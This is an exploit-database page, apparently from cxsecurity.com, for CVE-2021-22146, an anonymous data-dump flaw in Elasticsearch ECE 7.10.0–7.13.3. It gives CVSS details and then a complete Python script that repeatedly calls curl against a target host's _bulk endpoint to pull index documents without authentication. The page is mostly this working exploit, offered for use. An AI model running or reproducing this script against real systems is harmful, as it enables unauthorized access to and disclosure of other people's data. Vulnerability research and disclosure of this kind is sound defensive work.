Elasticsearch ECE 7.13.3 Database Disclosure

2021.07.26
Credit: Joan Martinez
Risk: High
Local: No
Remote: Yes
CWE: CWE-668


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top